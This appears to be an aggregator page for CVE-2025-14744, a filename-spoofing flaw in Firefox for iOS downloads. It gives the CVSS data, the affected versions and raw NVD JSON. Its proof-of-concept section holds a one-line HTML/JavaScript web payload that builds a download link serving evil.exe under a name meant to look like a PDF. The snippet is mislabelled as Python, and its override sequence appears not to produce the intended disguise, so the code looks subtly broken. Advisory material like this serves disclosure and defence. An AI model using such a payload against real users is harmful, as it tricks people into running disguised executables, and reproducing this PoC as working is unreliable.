Security Vulnerability Report
中文
CVE-2025-14744 CVSS 6.5 MEDIUM

CVE-2025-14744

Published: 2025-12-18 15:15:53
Last Modified: 2026-04-13 15:16:47

Description

Unicode RTLO characters could allow malicious websites to spoof filenames in the downloads UI for Firefox for iOS, potentially tricking users into saving files of an unexpected file type. This vulnerability was fixed in Firefox for iOS 144.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:*:iphone_os:*:* - VULNERABLE
Firefox for iOS < 144.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<script>window.location='data:text/html,<a href="evil.exe" download="document.pdf‮exe">Click</a>';</script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14744", "sourceIdentifier": "[email protected]", "published": "2025-12-18T15:15:52.500", "lastModified": "2026-04-13T15:16:47.220", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unicode RTLO characters could allow malicious websites to spoof filenames in the downloads UI for Firefox for iOS, potentially tricking users into saving files of an unexpected file type. This vulnerability was fixed in Firefox for iOS 144.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-451"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:iphone_os:*:*", "versionEndExcluding": "144.0", "matchCriteriaId": "0ED73B6B-B41E-4DB1-8FEC-6550365BC33D"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1984683", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-97/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}